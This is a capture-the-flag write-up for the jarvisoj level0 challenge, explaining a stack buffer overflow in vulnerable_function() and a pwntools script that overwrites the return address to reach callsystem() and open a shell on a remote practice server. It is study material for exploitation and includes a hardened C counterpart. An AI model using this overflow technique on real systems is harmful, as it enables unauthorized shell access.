
jarvisoj_level0

Ubuntu 16


0x01


checksec

[*] '/home/zelas/Desktop/pwn/level0/level0'
Arch: amd64-64-little
RELRO: No RELRO
Stack: No canary found
NX: NX enabled // the stack is not executable
PIE: No PIE (0x400000)
$ file level0
level0: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=8dc0b3ec5a7b489e61a71bc1afa7974135b0d3d4, not stripped

IDA

The vulnerable_function() function

ssize_t vulnerable_function()
{
    char buf[128]; // [rsp+0h] [rbp-80h] BYREF

    // stack overflow: read() accepts up to 0x200 bytes into a 128-byte buffer
    return read(0, buf, 0x200uLL);
}

Suspicious function: callsystem()

int callsystem()
{
    return system("/bin/sh");
}
// callsystem() is located at address 0x400596

0x02


Approach

1. Use the stack overflow in read() to overwrite the stack up to the saved return address (ret), pointing it at callsystem().

Stack layout of vulnerable_function():
s (buf)   0x80 bytes
rbp       0x8 bytes
ret       callsystem() 0x400596
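As an added example (not code from the original writeup), the frame arithmetic above written out in C next to a hardened form of vulnerable_function() whose read is capped at sizeof(buf); the function names and the pipe-based demo helper are my own assumptions.

```c
#include <stddef.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

/* Frame figures taken from the IDA listing in this writeup. */
#define BUF_SIZE      128    /* char buf[128]                      */
#define BUF_TO_RBP    0x80   /* buf lives at [rbp-80h]             */
#define SAVED_RBP_LEN 8      /* saved rbp on x86-64                */
#define READ_LEN      0x200  /* length the binary passes to read() */

/* Input bytes needed to reach the saved return address:
 * the buffer itself plus the saved rbp between it and the return slot. */
size_t padding_to_ret(void)
{
    return BUF_TO_RBP + SAVED_RBP_LEN;   /* 0x88 = 136 */
}

/* 1 if read_len bytes suffice to overwrite the whole 8-byte return address. */
int read_reaches_ret(size_t read_len)
{
    return read_len >= padding_to_ret() + 8;
}

/* Hardened counterpart of the page's vulnerable_function(): the read is
 * capped at sizeof(buf), so no input length can reach the saved rbp or ret. */
ssize_t hardened_function(int fd)
{
    char buf[BUF_SIZE];
    return read(fd, buf, sizeof buf);
}

/* Hypothetical demo helper: push `supplied` bytes (well under the pipe
 * buffer size) through a pipe into hardened_function() and return how
 * many bytes it actually consumed. */
ssize_t demo_hardened_read(size_t supplied)
{
    int fds[2];
    char *junk = malloc(supplied);
    ssize_t got = -1;
    if (junk == NULL || pipe(fds) != 0) { free(junk); return -1; }
    memset(junk, 'a', supplied);
    if (write(fds[1], junk, supplied) == (ssize_t)supplied)
        got = hardened_function(fds[0]);
    close(fds[0]); close(fds[1]);
    free(junk);
    return got;
}
```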

0x03


exp

from pwn import *

# io = process('./level0')             # local debugging against the binary
io = remote('node4.buuoj.cn', 25420)   # BUUOJ remote instance

callsystem = 0x400596        # address of callsystem(), from IDA
padding = 0x80 + 0x8         # 128-byte buf + 8-byte saved rbp

payload = b'a' * padding + p64(callsystem)

io.sendline(payload)
io.interactive()

